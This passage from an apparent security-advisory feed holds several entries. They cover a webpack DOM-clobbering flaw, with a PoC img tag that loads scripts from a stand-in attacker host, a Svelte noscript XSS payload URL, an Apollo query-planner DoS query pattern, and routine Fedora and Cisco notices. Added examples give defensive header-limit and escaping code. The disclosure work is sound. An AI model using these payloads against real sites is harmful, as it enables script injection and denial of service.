However, this code is vulnerable to a DOM Clobbering attack. The lookup on the line with `document.currentScript` can be shadowed by an attacker, causing it to return an attacker-controlled HTML element instead of the current script element as intended. In such a scenario, the `src` attribute of the attacker-controlled element will be used as the `scriptUrl` and assigned to `__webpack_require__.p`. If additional scripts are loaded from the server, `__webpack_require__.p` will be used as the base URL, pointing to the attacker's domain. This could lead to arbitrary script loading from the attacker's server, resulting in severe security risks.
### PoC
Please note that we have identified a real-world exploitation of this vulnerability in the Canvas LMS. Once the issue has been patched, I am willing to share more details on the exploitation. For now, I'm providing a demo to illustrate the concept.

Consider a website developer with the following two scripts, `entry.js` and `import1.js`, that are compiled using Webpack:

```javascript
// entry.js
import('./import1.js')
  .then(module => {
    module.hello();
  })
  .catch(err => {
    console.error('Failed to load module', err);
  });
```

```javascript
// import1.js
export function hello () {
  console.log('Hello');
}
```

The webpack.config.js is set up as follows:

```javascript
const path = require('path');

module.exports = {
  entry: './entry.js', // Ensure the correct path to your entry file
  output: {
    filename: 'webpack-gadgets.bundle.js', // Output bundle file
    path: path.resolve(__dirname, 'dist'), // Output directory
    publicPath: "auto", // Or leave this field not set
  },
  target: 'web',
  mode: 'development',
};
```

When the developer builds these scripts into a bundle and adds it to a webpage, the page could load the `import1.js` file from the attacker's domain, `attacker.controlled.server`. The attacker only needs to insert an `img` tag with the `name` attribute set to `currentScript`. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.

```html
<!DOCTYPE html>
<html>
<head>
  <title>Webpack Example</title>
  <!-- Attacker-controlled Script-less HTML Element starts--!>
  <img name="currentScript" src="https://attacker.controlled.server/"></img>
  <!-- Attacker-controlled Script-less HTML Element ends--!>
</head>
<script src="./dist/webpack-gadgets.bundle.js"></script>
<body>
</body>
</html>
```

### Impact
This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes.
### Patch
A possible patch to this vulnerability could refer to the Google Closure project, which makes itself resistant to DOM Clobbering attacks: https://github.com/google/closure-library/blob/b312823ec5f84239ff1db7526f4a75cba0420a33/closure/goog/base.js#L174

```javascript
/******/ 	/* webpack/runtime/publicPath */
/******/ 	(() => {
/******/ 		var scriptUrl;
/******/ 		if (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + "";
/******/ 		var document = __webpack_require__.g.document;
/******/ 		if (!scriptUrl && document) {
/******/ 			if (document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT') // Assume attacker cannot control script tag, otherwise it is XSS already :>
/******/ 				scriptUrl = document.currentScript.src;
/******/ 			if (!scriptUrl) {
/******/ 				var scripts = document.getElementsByTagName("script");
/******/ 				if(scripts.length) {
/******/ 					var i = scripts.length - 1;
/******/ 					while (i > -1 && (!scriptUrl || !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src;
/******/ 				}
/******/ 			}
/******/ 		}
/******/ 		// When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration
/******/ 		// or pass an empty string ("") and set the __webpack_public_path__ variable from your code to use your own logic.
/******/ 		if (!scriptUrl) throw new Error("Automatic publicPath is not supported in this browser");
/******/ 		scriptUrl = scriptUrl.replace(/#.*$/, "").replace(/\?.*$/, "").replace(/\/[^\/]+$/, "/");
/******/ 		__webpack_require__.p = scriptUrl;
/******/ 	})();
```

Please note that if we do not receive a response from the development team within three months, we will disclose this vulnerability to the CVE agent.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-4VVJ-4CPR-P986

27.08.2024 21:14:13 | npm | [NPM:GHSA-FMJ9-77Q8-G6C4] Apollo Query Planner and Apollo Gateway may infinitely loop on sufficiently complex queries (high)
### Impact
Instances of @apollo/query-planner >=2.0.0 and <2.8.5 are impacted by a denial-of-service vulnerability. @apollo/gateway versions >=2.0.0 and < 2.8.5 and Apollo Router <1.52.1 are also impacted through their use of @apollo/query-planner. If @apollo/query-planner is asked to plan a sufficiently complex query, it may loop infinitely and never complete. This results in unbounded memory consumption and either a crash or out-of-memory (OOM) termination.

This issue can be triggered if you have at least one non-`@key` field that can be resolved by multiple subgraphs. To identify these shared fields, the schema for each subgraph must be reviewed. The mechanism to identify shared fields varies based on the version of Federation your subgraphs are using.

You can check if your subgraphs are using Federation 1 or Federation 2 by reviewing their schemas. Federation 2 subgraph schemas will contain a `@link` directive referencing the version of Federation being used while Federation 1 subgraphs will not. For example, in a Federation 2 subgraph, you will find a line like `@link(url: "https://specs.apollo.dev/federation/v2.0")`. If a similar `@link` directive is not present in your subgraph schema, it is using Federation 1. Note that a supergraph can contain a mix of Federation 1 and Federation 2 subgraphs.

**To review Federation 1 subgraphs for impact:**
In Federation 1 subgraphs, fields are implicitly shareable across subgraphs. To review for impact, you will need to review for cases where multiple subgraphs can resolve the same field. For example:

```graphql
# Subgraph 1
type Query {
  field: Int
}

# Subgraph 2
type Query {
  field: Int
}
```

**To review Federation 2 subgraphs for impact:**
In Federation 2 subgraphs, fields must be explicitly defined as shareable across subgraphs. This is done via the `@shareable` directive. For example:

```graphql
# Subgraph 1
@link(url: "https://specs.apollo.dev/federation/v2.0")
type Query {
  field: Int @shareable
}

# Subgraph 2
@link(url: "https://specs.apollo.dev/federation/v2.0")
type Query {
  field: Int @shareable
}
```

### Impact Detail
This issue results from the Apollo query planner attempting to use a `Number` exceeding Javascript's `Number.MAX_VALUE` in some cases. In Javascript, `Number.MAX_VALUE` is (2^1024 - 2^971).

When the query planner receives an inbound graphql request, it breaks the query into pieces and for each piece, generates a list of potential execution steps to solve the piece. These candidates represent the steps that the query planner will take to satisfy the pieces of the larger query. As part of normal operations, the query planner requires and calculates the number of possible query plans for the total query. That is, it needs the product of the number of query plan candidates for each piece of the query. Under normal circumstances, after generating all query plan candidates and calculating the number of all permutations, the query planner moves on to stack rank candidates and prune less-than-optimal options. In particularly complex queries, especially those where fields can be solved through multiple subgraphs, this can cause the number of all query plan permutations to balloon. In worst-case scenarios, this can end up being a number larger than `Number.MAX_VALUE`. In Javascript, if `Number.MAX_VALUE` is exceeded, Javascript represents the value as "infinity". If the count of candidates is evaluated as infinity, the component of the query planner responsible for pruning less-than-optimal query plans does not actually prune candidates, causing the query planner to evaluate many orders of magnitude more query plan candidates than necessary.

A given graph's exposure to this issue varies based on its complexity. Consider the following Federation 2 subgraphs:

```graphql
# Subgraph 1
type Query {
  field: Int @shareable
}

# Subgraph 2
type Query {
  field: Int @shareable
}
```

The query planner can solve requests for `Query.field` in one of two ways - either by querying subgraph 1 or subgraph 2. The following query with 1024 aliased fields would trigger this issue because 2^1024 > `Number.MAX_VALUE`:

```graphql
query {
  field_1: field
  field_2: field
  # ...
  field_1023: field
  field_1024: field
}
```

However, in a graph that provided 5 options to solve a given field, the bug could be encountered in a query that aliased the field approximately 440 times.
### Patches
@apollo/query-planner 2.8.5
@apollo/gateway 2.8.5
Apollo Router 1.52.1
### Workarounds
This issue can be avoided by ensuring there are no fields resolvable from multiple subgraphs. If all subgraphs are using Federation 2, you can confirm that you are not impacted by ensuring that none of your subgraph schemas use the `@shareable` directive. If you are using Federation 1 subgraphs, you will need to validate that there are no fields resolvable by multiple subgraphs. Note that a supergraph can contain a mix of Federation 1 and Federation 2 subgraphs. If you do have fields resolvable by multiple subgraphs, changing this behavior in response to this issue may be risky to the operation of your supergraph. We recommend that you update to a patched version of either Apollo Router or Apollo Gateway.

Apollo customers with an enterprise entitlement using the Apollo Router can also mitigate much of the risk from this issue by implementing [Apollo's Persisted Queries (PQ) feature](https://www.apollographql.com/docs/router/configuration/persisted-queries). With PQ enabled, the Apollo Router will only execute safelisted queries. While customers would need to ensure that queries that induce this issue are not added to the safelist, PQs would mitigate the risk of clients submitting ad hoc queries that exploit this issue.
### References
[Additional information on Query Plans](https://www.apollographql.com/docs/federation/query-plans/)
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-FMJ9-77Q8-G6C4

27.08.2024 20:09:06 | fedora | [FEDORA-2024-a455bea9ca] Fedora 40: calibre (critical)
Fix fonts for < f41 releases.
Upgrade to latest upstream release to fix 4 CVEs and enable new hardware
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-a455bea9ca

27.08.2024 20:08:59 | fedora | [FEDORA-2024-f4eb809b49] Fedora 40: dotnet8.0 (medium)
This is the August 2024 monthly update for .NET 8. This includes a fix for CVE-2024-38167
Release Notes:
SDK: https://github.com/dotnet/core/blob/main/release-notes/8.0/8.0.8/8.0.108.md
Runtime: https://github.com/dotnet/core/blob/main/release-notes/8.0/8.0.8/8.0.8.md
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-f4eb809b49

27.08.2024 20:08:55fedora[FEDORA-2024-1f1c0537d3] Fedora 40: webkit2gtk4.0 (critical)Update to 2.44.3https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-1f1c0537d3
27.08.2024 20:08:53fedora[FEDORA-2024-6b8845e3f0] Fedora 40: webkitgtk (critical)Fix web process cache suspend/resume when sandbox is enabled. Fix accelerated images disappearing after scrolling. Fix video flickering with DMA-BUF sink. Fix pointer lock on X11. Fix movement delta on mouse events in GTK3. Undeprecate console message API and make it available in 2022 API. Fix several crashes and rendering issues.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-6b8845e3f0
27.08.2024 22:52:15npm[NPM:GHSA-48X4-MX8F-GR4H] Flowise Unauthenticated Denial of Service (DoS) vulnerability (high)An Unauthenticated Denial of Service (DoS) vulnerability exists in Flowise version 1.8.2 leading to a complete crash of the instance running a vulnerable version due to improper handling of user supplied input to the `/api/v1/get-upload-file` api endpoint.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-48X4-MX8F-GR4H
28.08.2024 00:47:13npm[NPM:GHSA-2Q4W-X8H2-2FVH] Flowise Authentication Bypass vulnerability (high)An Authentication Bypass vulnerability exists in Flowise version 1.8.2. This could allow a remote, unauthenticated attacker to access API endpoints as an administrator and allow them to access restricted functionality.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-2Q4W-X8H2-2FVH
27.08.2024 05:00:48fedora[FEDORA-2024-8eff1bffb1] Fedora 39: dotnet8.0 (medium)This is the August 2024 monthly update for .NET 8. This includes a fix for CVE-2024-38167. Release Notes: SDK: https://github.com/dotnet/core/blob/main/release-notes/8.0/8.0.8/8.0.108.md Runtime: https://github.com/dotnet/core/blob/main/release-notes/8.0/8.0.8/8.0.8.mdhttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-8eff1bffb1
27.08.2024 03:00:00cisa[CISA-2024:0827] CISA Adds One Known Exploited Vulnerability to Catalog (high)CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0827
27.08.2024 03:00:00debian[DSA-5759-1] python3.11 (high)security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5759-1
28.08.2024 19:00:00cisco[CISCO-SA-NXOS-PSBE-CE-YVBTN5DU] Cisco NX-OS Software Python Sandbox Escape Vulnerabilities (medium)Multiple vulnerabilities in the Python interpreter of Cisco NX-OS Software could allow an authenticated, low-privileged, local attacker to escape the Python sandbox and gain unauthorized access to the underlying operating system of the device. These vulnerabilities are due to insufficient validation of user-supplied input. An attacker could exploit these vulnerabilities by manipulating specific functions within the Python interpreter. A successful exploit could allow an attacker to escape the Python sandbox and execute arbitrary commands on the underlying operating system with the privileges of the authenticated user. Note: An attacker must be authenticated with Python execution privileges to exploit these vulnerabilities. For more information regarding Python execution privileges, see product-specific documentation, such as the Cisco NX-OS Security with Python section (https://www.cisco.com/c/en/us/td/docs/dcn/nx-os/nexus9000/105x/programmability/cisco-nexus-9000-series-nx-os-programmability-guide-105x/m-n9k-python-api-101x.html?bookSearch=true#concept_A2CFF094ADCB414C983EA06AD8E9A410) of the Cisco Nexus 9000 Series NX-OS Programmability Guide. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is available at the following link: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-psbe-ce-YvbTn5du This advisory is part of the August 2024 Cisco FXOS and NX-OS Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: August 2024 Semiannual Cisco FXOS and NX-OS Software Security Advisory Bundled Publication (https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75417).https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NXOS-PSBE-CE-YVBTN5DU
28.08.2024 19:00:00cisco[CISCO-SA-NXOS-DHCP6-RELAY-DOS-ZNEAA6XN] Cisco NX-OS Software DHCPv6 Relay Agent Denial of Service Vulnerability (high)A vulnerability in the DHCPv6 relay agent of Cisco NX-OS Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to improper handling of specific fields in a DHCPv6 RELAY-REPLY message. An attacker could exploit this vulnerability by sending a crafted DHCPv6 packet to any IPv6 address that is configured on an affected device. A successful exploit could allow the attacker to cause the dhcp_snoop process to crash and restart multiple times, causing the affected device to reload and resulting in a DoS condition. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is part of the August 2024 Cisco FXOS and NX-OS Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: August 2024 Semiannual Cisco FXOS and NX-OS Software Security Advisory Bundled Publication (https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75417).https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NXOS-DHCP6-RELAY-DOS-ZNEAA6XN
28.08.2024 19:00:00cisco[CISCO-SA-NXOS-CMDINJ-LQ6JSZHH] Cisco NX-OS Software Command Injection Vulnerability (medium)A vulnerability in the CLI of Cisco NX-OS Software could allow an authenticated, low-privileged, local attacker to execute arbitrary commands on the underlying operating system of an affected device. This vulnerability is due to insufficient validation of arguments for a specific CLI command. An attacker could exploit this vulnerability by including crafted input as the argument of the affected command. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of the currently logged-in user. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is part of the August 2024 Cisco FXOS and NX-OS Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: August 2024 Semiannual Cisco FXOS and NX-OS Software Security Advisory Bundled Publication (https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75417).https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NXOS-CMDINJ-LQ6JSZHH
28.08.2024 19:00:00cisco[CISCO-SA-NXOS-BSHACEPE-BAPEHSX7] Cisco NX-OS Software Bash Arbitrary Code Execution and Privilege Escalation Vulnerabilities (medium)Multiple vulnerabilities in Cisco NX-OS Software could allow an authenticated, local attacker with privileges to access the Bash shell to execute arbitrary code with root privileges or elevate privileges to network-admin on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is part of the August 2024 Cisco FXOS and NX-OS Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: August 2024 Semiannual Cisco FXOS and NX-OS Software Security Advisory Bundled Publication (https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75417).https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NXOS-BSHACEPE-BAPEHSX7
28.08.2024 19:00:00cisco[CISCO-SA-CAPIC-PRIV-ESC-UYQJJNUU] Cisco Application Policy Infrastructure Controller Privilege Escalation Vulnerability (medium)A vulnerability in the software upgrade component of Cisco Application Policy Infrastructure Controller (APIC) and Cisco Cloud Network Controller, formerly Cisco Cloud APIC, could allow an authenticated, remote attacker with Administrator-level privileges to install a modified software image, leading to arbitrary code injection on an affected system.This vulnerability is due to insufficient signature validation of software images. An attacker could exploit this vulnerability by installing a modified software image. A successful exploit could allow the attacker to execute arbitrary code on the affected system and elevate their privileges to root.Note: Administrators should always validate the hash of any upgrade image before uploading it to Cisco APIC and Cisco Cloud Network Controller.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CAPIC-PRIV-ESC-UYQJJNUU
28.08.2024 19:00:00cisco[CISCO-SA-APIC-COUSMO-UBPBYGBQ] Cisco Application Policy Infrastructure Controller Unauthorized Policy Actions Vulnerability (medium)A vulnerability in the restricted security domain implementation of Cisco Application Policy Infrastructure Controller (APIC) could allow an authenticated, remote attacker to modify the behavior of default system policies, such as quality of service (QoS) policies, on an affected system.This vulnerability is due to improper access control when restricted security domains are used to implement multi-tenancy. An attacker with a valid user account associated with a restricted security domain could exploit this vulnerability. A successful exploit could allow the attacker to read, modify, or delete child policies created under default system policies, which are implicitly used by all tenants in the fabric, resulting in disruption of network traffic. Exploitation is not possible for policies under tenants that an attacker has no authorization to access.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-APIC-COUSMO-UBPBYGBQ
28.08.2024 05:37:07fedora[FEDORA-2024-e23e8a3f1e] Fedora 40: dovecotCVE-2024-23184: A large number of address headers in email resulted in excessive CPU usage. CVE-2024-23185: Abnormally large email headers are now truncated or discarded, with a limit of 10MB on a single header and 50MB for all the headers of all the parts of an email.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e23e8a3f1e
28.08.2024 05:22:26fedora[FEDORA-2024-ba5bb9f63a] Fedora 39: dovecotCVE-2024-23184: A large number of address headers in email resulted in excessive CPU usage. CVE-2024-23185: Abnormally large email headers are now truncated or discarded, with a limit of 10MB on a single header and 50MB for all the headers of all the parts of an email.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-ba5bb9f63a
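Both Dovecot fixes above are the same shape of defence: bound what a header block is allowed to cost before it is parsed. The following added example (written for this page, not Dovecot's code) is a small RFC 5322 header reader that applies the advisory's 10 MB per-header and 50 MB total limits while reading, handles folded continuation lines, and additionally caps the number of address headers (the cap of 100 is an assumption; the advisory gives no figure for CVE-2024-23184). All sample messages are constructed.

```python
# Added example, not Dovecot's code: a bounded header reader that rejects a
# message as soon as a single header, the whole header block, or the number
# of address headers exceeds a limit, instead of parsing it in full.
import io

MAX_SINGLE_HEADER = 10 * 1024 * 1024   # 10 MB per header (figure from the advisory)
MAX_TOTAL_HEADERS = 50 * 1024 * 1024   # 50 MB for all headers (figure from the advisory)
MAX_ADDRESS_HEADERS = 100              # assumed cap; the advisory gives no number

# Headers whose values are address lists and therefore expensive to parse.
ADDRESS_HEADERS = {"from", "to", "cc", "bcc", "reply-to", "sender",
                   "resent-from", "resent-to", "resent-cc"}


class HeaderLimitExceeded(ValueError):
    pass


def read_headers(raw: bytes,
                 max_single: int = MAX_SINGLE_HEADER,
                 max_total: int = MAX_TOTAL_HEADERS,
                 max_address_headers: int = MAX_ADDRESS_HEADERS):
    """Return [(name, value), ...] for the header block of `raw`, honouring
    folded continuation lines, or raise HeaderLimitExceeded the moment a
    limit is passed. The body after the blank line is never read."""
    stream = io.BytesIO(raw)
    headers = []
    total = 0
    address_count = 0
    name = None
    value = bytearray()

    def finish_current():
        nonlocal name, value, address_count
        if name is None:
            return
        if name.lower() in ADDRESS_HEADERS:
            address_count += 1
            if address_count > max_address_headers:
                raise HeaderLimitExceeded(
                    f"more than {max_address_headers} address headers")
        headers.append((name, bytes(value).strip()))
        name, value = None, bytearray()

    while True:
        line = stream.readline()
        if not line:
            raise ValueError("header block not terminated by an empty line")
        total += len(line)
        if total > max_total:
            raise HeaderLimitExceeded(f"header block exceeds {max_total} bytes")
        body = line.rstrip(b"\r\n")
        if body == b"":
            finish_current()            # empty line ends the header block
            return headers
        if body[:1] in (b" ", b"\t"):   # folded continuation of current header
            if name is None:
                raise ValueError("continuation line before any header")
            value += body
        else:
            finish_current()
            colon = body.find(b":")
            if colon <= 0:
                raise ValueError(f"malformed header line: {body[:40]!r}")
            name = body[:colon].decode("ascii", "replace").strip()
            value = bytearray(body[colon + 1:])
        if len(value) > max_single:
            raise HeaderLimitExceeded(f"header {name!r} exceeds {max_single} bytes")


if __name__ == "__main__":
    # Constructed messages; none of this is real mail.
    ok = b"From: a@example.test\r\nSubject: hi\r\n there\r\n\r\nbody\r\n"
    print(read_headers(ok))
    flood = b"".join(b"To: u%d@example.test\r\n" % i for i in range(200)) + b"\r\n"
    try:
        read_headers(flood)
    except HeaderLimitExceeded as e:
        print("rejected:", e)
```

The per-header check runs after every line, so a 10 MB `Subject:` built from thousands of folded lines is rejected at the line that crosses the limit, not after the whole thing has been accumulated. Whether an over-limit header should be truncated (as the Dovecot fix does) or the message rejected is a policy choice; rejecting is the simpler behaviour to reason about at an MTA boundary.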
28.08.2024 03:00:00cisa[CISA-2024:0828] CISA Adds One Known Exploited Vulnerability to Catalog (high)CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0828
28.08.2024 10:33:12pypi[PYSEC-2024-72] ekuiper vulnerabilityLF Edge eKuiper is a lightweight IoT data analytics and stream processing engine running on resource-constrained edge devices. A user could exploit SQL injection to execute a malicious SQL query via the Get method in sqlKvStore. This vulnerability is fixed in 1.14.2.https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-72
30.08.2024 02:15:10alpinelinux[ALPINE:CVE-2024-1545] wolfssl vulnerability (medium)[From CVE-2024-1545] Fault injection vulnerability in the RsaPrivateDecryption function in wolfssl/wolfcrypt/src/rsa.c in wolfSSL 5.6.6 on Linux/Windows allows a remote attacker that co-resides on the same system with a victim process to disclose information and escalate privileges via Rowhammer fault injection into the RsaKey structure.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-1545
29.08.2024 04:35:04fedora[FEDORA-2024-254c31b144] Fedora 40: python3.6 (medium)Security fix for CVE-2024-6923https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-254c31b144
29.08.2024 04:34:58fedora[FEDORA-2024-c0e7a4f5ef] Fedora 40: less (high)Security fix for CVE-2024-32487 - less with LESSOPEN mishandles \n in pathshttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-c0e7a4f5ef
29.08.2024 04:31:10fedora[FEDORA-2024-a7af4e0ea2] Fedora 39: python3.6 (medium)Security fix for CVE-2024-6923https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-a7af4e0ea2
29.08.2024 16:46:13almalinux[ALSA-2024:6000] postgresql:12 security update (important)postgresql:12 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6000
29.08.2024 16:39:16almalinux[ALSA-2024:6001] postgresql:15 security update (important)postgresql:15 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6001
29.08.2024 16:41:13almalinux[ALSA-2024:6018] postgresql:13 security update (important)postgresql:13 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6018
29.08.2024 16:54:02almalinux[ALSA-2024:5999] postgresql security update (important)postgresql security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:5999
29.08.2024 16:44:43almalinux[ALSA-2024:6020] postgresql:15 security update (important)postgresql:15 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6020
29.08.2024 03:00:00debian[DSA-5760-1] ghostscript (high)security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5760-1
29.08.2024 11:25:04almalinux[ALSA-2024:5941] libvpx security update (moderate)libvpx security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:5941
29.08.2024 11:29:21almalinux[ALSA-2024:5962] python39:3.9 and python39-devel:3.9 security update (moderate)python39:3.9 and python39-devel:3.9 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:5962
29.08.2024 03:00:00freebsd[FREEBSD:6F2545BB-65E8-11EF-8A0F-A8A1599412C6] chromium -- multiple security fixes (high)Chrome Releases reports: This update includes 4 security fixes: [351865302] High CVE-2024-7969: Type Confusion in V8. Reported by CFF of Topsec Alpha Team on 2024-07-09 [360265320] High CVE-2024-8193: Heap buffer overflow in Skia. Reported by Renan Rios (@hyhy_100) on 2024-08-16 [360533914] High CVE-2024-8194: Type Confusion in V8. Reported by Seunghyun Lee (@0x10n) on 2024-08-18 [360758697] High CVE-2024-8198: Heap buffer overflow in Skia. Reported by Renan Rios (@hyhy_100) on 2024-08-19https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:6F2545BB-65E8-11EF-8A0F-A8A1599412C6
30.08.2024 23:01:24npm[NPM:GHSA-8266-84WP-WV5C] Svelte has a potential mXSS vulnerability due to improper HTML escaping (moderate)
### Summary

A potential XSS vulnerability exists in Svelte for versions prior to 4.2.19.

### Details

Svelte improperly escapes HTML on server-side rendering. It converts strings according to the following rules:

- If the string is an attribute value:
  - `"` -> `&quot;`
  - `&` -> `&amp;`
  - Other characters -> No conversion
- Otherwise:
  - `<` -> `&lt;`
  - `&` -> `&amp;`
  - Other characters -> No conversion

The assumption is that attributes will always stay as such, but in some situations the final DOM tree rendered by browsers is different from what Svelte expects on server-side rendering. This may be leveraged to perform XSS attacks. More specifically, this can occur when injecting malicious content into an attribute within a `<noscript>` tag.

### PoC

A vulnerable page (`+page.svelte`):

```html
<script>
import { page } from "$app/stores"
// user input
let href = $page.url.searchParams.get("href") ?? "https://example.com";
</script>
<noscript>
  <a href={href}>test</a>
</noscript>
```

If a user accesses the following URL,

```
http://localhost:4173/?href=</noscript><script>alert(123)</script>
```

then `alert(123)` will be executed.

### Impact

XSS, when using an attribute within a noscript tag
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-8266-84WP-WV5C
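The mutation that makes this an mXSS is that a browser with scripting enabled treats the content of `<noscript>` as raw text up to the first `</noscript>`, so an unescaped `<` inside an attribute value becomes a tag boundary. The following added example (written for this page, not Svelte's renderer) re-implements the two escaping rules quoted in the advisory, renders the PoC component with the PoC payload, models the raw-text parse of `<noscript>`, and contrasts it with an attribute escaper that also neutralises `<` and `>`. That hardened escaper is the general remedy for this class of bug and is labelled here as an illustration, not as the exact patch shipped in 4.2.19.

```python
# Added example, not Svelte's code: the advisory's escaping rules applied
# to the PoC, and why escaping `<` in attribute values closes the hole.

def escape_attr_svelte(value: str) -> str:
    """Attribute rule from the advisory: only `"` and `&` are converted."""
    return value.replace("&", "&amp;").replace('"', "&quot;")


def escape_text_svelte(value: str) -> str:
    """Text-node rule from the advisory: only `<` and `&` are converted."""
    return value.replace("&", "&amp;").replace("<", "&lt;")


def escape_attr_hardened(value: str) -> str:
    """Attribute escaper that also converts `<` and `>`, so an attribute
    value can never contain a tag boundary even if the browser later treats
    the enclosing markup as raw text."""
    return (value.replace("&", "&amp;").replace('"', "&quot;")
                 .replace("<", "&lt;").replace(">", "&gt;"))


def render_noscript_link(href: str, escape_attr=escape_attr_svelte) -> str:
    """Server-side render of the PoC component
    `<noscript><a href={href}>test</a></noscript>` with a chosen escaper."""
    return f'<noscript>\n  <a href="{escape_attr(href)}">test</a>\n</noscript>'


def noscript_breakout(html: str):
    """Model of a browser with scripting enabled: everything after the
    opening <noscript> is raw text up to the FIRST `</noscript>`, after
    which normal HTML parsing resumes. Returns the markup that ends up
    parsed as HTML outside the element, or None if the only `</noscript>`
    is the one the template itself rendered."""
    start = html.index("<noscript>") + len("<noscript>")
    end = html.find("</noscript>", start)
    after = html[end + len("</noscript>"):]
    return after.strip() or None


PAYLOAD = "</noscript><script>alert(123)</script>"  # from the advisory's PoC URL

if __name__ == "__main__":
    print(render_noscript_link(PAYLOAD))
    print("vulnerable:", noscript_breakout(render_noscript_link(PAYLOAD)))
    print("hardened  :", noscript_breakout(render_noscript_link(PAYLOAD, escape_attr_hardened)))
```

Note that the text-node rule already escapes `<`; the attribute rule did not because, in a normal parse, an attribute value cannot close a tag. Any context in which the same serialized bytes are re-parsed under different rules (`<noscript>` here, but also `<template>`, `<iframe srcdoc>`, or innerHTML round-trips) breaks that assumption, which is why escaping `<` and `>` in attributes unconditionally is the safer default.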
30.08.2024 16:58:10cert[VU:455367] Insecure Platform Key (PK) used in UEFI system firmware signature
### Overview

A vulnerability in the use of hard-coded Platform Keys (PK) within the UEFI framework, known as PKfail, has been discovered. This flaw allows attackers to bypass critical UEFI security mechanisms like Secure Boot, compromising the trust between the platform owner and firmware and enabling manipulation of sensitive system settings.

### Description

The UEFI standard establishes trust relationships using Public Key Infrastructure (PKI) between the platform owner, the platform firmware, and the operating system. Central to this process is the Platform Key (PK), which is designed to secure the connection between the platform owner and the platform firmware.

> The platform owner enrolls the public half of the key (PKpub) into the platform firmware. The platform owner can later use the private half of the key (PKpriv) to change platform ownership or to enroll a Key Exchange Key. For UEFI, the recommended Platform Key format is RSA-2048.

(Section 7.2.1 of the UEFI 2.3.1 Errata C standard)

The PKfail vulnerability highlights a critical flaw in the UEFI ecosystem. While the Platform Key is expected to originate from the Original Equipment Manufacturer (OEM) using a secure hardware security module (HSM), in practice much of the UEFI software and drivers are developed by a complex network of supply-chain partners and Independent BIOS Vendors (IBVs). These components are often shared across multiple OEMs. In some cases, temporary test software keys, or "softkeys," which are hard-coded for ease of build and testing, inadvertently make their way into production firmware.

